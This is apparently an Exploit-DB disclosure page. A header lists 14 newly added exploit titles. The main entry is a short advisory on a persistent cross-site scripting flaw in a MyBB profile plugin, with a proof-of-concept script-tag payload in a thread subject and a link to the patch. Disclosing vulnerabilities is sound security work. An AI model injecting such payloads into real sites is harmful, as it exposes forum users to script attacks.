e3fb91f1d7
14 changes to exploits/shellcodes Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Dell EMC NetWorker - Denial of Service WM Recorder 16.8.1 - Denial of Service Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve ) Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH) Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery XenForo 2 - CSS Loader Denial of Service MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion Linux/x86 - EggHunter Shellcode (11 Bytes)
23 lines
No EOL
684 B
Text
23 lines
No EOL
684 B
Text
# Exploit Title: MyBB Last User's Threads in Profile Plugin v1.2 - Persistent XSS
|
|
# Date: 3/19/2018
|
|
# Author: 0xB9
|
|
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
|
|
# Software Link: https://community.mybb.com/mods.php?action=view&pid=910
|
|
# Version: v1.2
|
|
# Tested on: Ubuntu 17.10
|
|
|
|
|
|
1. Description:
|
|
Display last threads in user profile.
|
|
|
|
|
|
2. Proof of Concept:
|
|
|
|
Persistent XSS
|
|
- Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
- Now visit your profile to see the alert.
|
|
|
|
|
|
3. Solution:
|
|
|
|
Patch: https://github.com/vintagedaddyo/MyBB_Plugin_Last-User-s-Threads-in-Profile/commit/5e3b81450d0bf7935885db2622f1a42e5961258d |